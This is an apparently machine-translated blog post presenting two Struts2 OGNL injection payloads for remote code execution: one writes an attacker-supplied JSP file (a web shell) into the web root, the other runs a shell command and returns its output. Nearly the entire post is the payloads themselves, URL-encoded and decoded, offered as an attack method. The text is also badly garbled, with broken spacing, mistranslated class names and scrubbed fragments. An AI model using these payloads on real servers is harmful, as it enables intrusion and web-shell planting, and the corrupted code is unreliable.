Struts2 Remote Execution Vulnerability
Method 1: Create a new file, write your own content in the file, and add & Data = the content attack address in the file he1p. jsp? Class. classloader. jarpath = (% 23 context % 5B % 22xwork. methodaccessor. denymethodexecution % 22% 5d % 3d + new + Java. lang. boolean (false) % 2C + % 23_memberaccess % 5B % 22 allowstaticmethodaccess % 22% 5d % 3 dtrue % 2C + % 23req % 3d % 40org. apache. struts2.servletactioncontext % 40 getrequest () % 2C + % 23sb % 3 dnew + Java. lang. stringbuffer () % 2C + % 23sb. append (% 23req. getrealpath ("/") % 2C + % 23sb. append ("he1p. JSP ") % 2C + % 23fos % 3 dnew + Java. io. fileoutpu Tstream (% 23sb. tostring () % 2C + % 23fos. write (% 23req. getparameter ('data '). getbytes () % 2C + % 23 darky % 3d % [email protected] (). getwriter () % 2C + % 23darky. println ("suceessful") % 2C + % 23darky. close () % 2C + % 23fos. close () (aa) & X [(class. classloader. jarpath) ('A')] source code after escape: Attack address? Class. classloader. jarpath = (# context ["xwork. methodaccessor. denymethodexecution "] = + new + Java. lang. boolean (false), + # _ memberaccess ["allowstaticmethodaccess"] = true, + # [email protected] @ getrequest (), + # sb = new + Java. lang. stringbuffer (), + # sb. append (# req. getrealpath ("/"), + # sb. append ("he1p. JSP "), + # Fos = new + Java. io. fileoutputstream (# sb. tostring (), + # FOS. write (# req. getparameter ('data '). getbytes (), + # [emai L protected] @ getresponse (). getwriter (), + # darky. println ("suceessful"), + # darky. close (), + # FOS. close () (aa) & X [(class. classloader. jarpath) ('A')] The second attack method is to execute the CMD command to attack the address? Class. classloader. jarpath = (% 23 context % 5B % 22xwork. methodaccessor. denymethodexecution % 22% 5d % 3d + new + Java. lang. boolean (false) % 2C + % 23_memberaccess % 5B % 22 allowstaticmethodaccess % 22% 5d % 3 dtrue % 2C + % 23 darky % 3d % 40org. apache. struts2.servletactioncontext % 40 getresponse (). getwriter () % 2C + %23myret%3d%40java.lang.runtime%40getruntime(%.exe C ("ls-La") % 2C + % 23is % 3d % 23myret. getinputstream () % 2C + % 23 S % 3d + new + Java. util. Second (% 23is ). usedelimiter ("\ A") % 2C + % 23darky. println (% 23s. next () % 2C + % 23darky. close () (aa) & X [(class. classloader. jarpath) ('A')] is the address attacked after escaping? Class. classloader. jarpath = (# context ["xwork. methodaccessor. denymethodexecution "] = + new + Java. lang. boolean (false), + # _ memberaccess ["allowstaticmethodaccess"] = true, + # [email protected] @ getresponse (). getwriter (), ++ # [email protectedtime@getruntime(cmd.exe C ("ls-La"), ++ # Is = # myret. getinputstream (), + # S = + new + Java. util. begin (# is ). usedelimiter ("\ A"), + # darky. println (# S. next (), + # darky. close () (aa) & X [(class. CIA Ssloader. jarpath) ('A')] Attack address? Class. classloader. jarpath = (# context ["xwork. methodaccessor. denymethodexecution "] = + new + Java. lang. boolean (false), + # _ memberaccess ["allowstaticmethodaccess"] = true, + # [email protected] @ getresponse (). getwriter (), ++ # [email protectedtime@getruntime(cmd.exe C ("ls-La"), ++ # Is = # myret. getinputstream (), + # S = + new + Java. util. begin (# is ). usedelimiter ("\ A"), + # darky. println (# S. next (), + # darky. close () (aa) & X [(class. classloader. jarpath) ('A')]
This article from the "big treasure sweet see" blog, please be sure to keep this source http://abao0918.blog.51cto.com/1017613/1439049